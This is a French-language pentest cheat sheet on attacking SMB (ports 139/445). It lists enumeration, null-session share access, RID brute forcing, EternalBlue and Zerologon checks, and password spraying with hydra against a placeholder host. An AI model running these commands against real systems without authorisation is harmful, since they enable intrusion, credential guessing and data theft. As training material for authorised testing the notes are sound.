Whackermelon
notes / exploitation-des-services / 139-445-smb

139, 445 - SMB

sommaire

Énumération (netexec / nxc — ex crackmapexec)

nxc smb 10.10.10.10                                  # OS, hostname, domaine, signing
nxc smb 10.10.10.10 -u '' -p '' --shares                # session nulle -> partages
nxc smb 10.10.10.10 -u guest -p '' --users --pass-pol   # utilisateurs + politique de mdp
nxc smb 10.10.10.10 -u user -p pass --shares --rid-brute

enum4linux-ng / smbmap

enum4linux-ng -A 10.10.10.10
smbmap -H 10.10.10.10                    # partages + permissions
smbmap -H 10.10.10.10 -u null
smbmap -H 10.10.10.10 -u user -p pass -R partage   # -R = recursif

smbclient (session nulle, accès partages)

smbclient -L //10.10.10.10/ -N               # lister les partages (session nulle)
smbclient //10.10.10.10/partage -N
smbclient //10.10.10.10/partage -U 'user%pass'
# dans smbclient : ls, get <f>, put <f>, recurse ON, prompt OFF, mget *

rpcclient (énumération détaillée)

rpcclient -U '' -N 10.10.10.10
> enumdomusers    > querydispinfo   > enumdomgroups
> queryuser 0x1f4  > lookupnames administrator   > getdompwinfo

Vulnérabilités

nmap -p445 --script 'smb-vuln-*' 10.10.10.10
nxc smb 10.10.10.10 -u '' -p '' -M ms17-010     # EternalBlue (MS17-010)
# aussi : SMBGhost (CVE-2020-0796), Zerologon (nxc ... -M zerologon)

Brute force / password spray & montage

nxc smb 10.10.10.10 -u users.txt -p passwords.txt --continue-on-success
hydra -L users.txt -P rockyou.txt smb://10.10.10.10
sudo mount -t cifs //10.10.10.10/partage /mnt -o username=user,password=pass
sudo mount -t cifs //10.10.10.10/partage /mnt -o guest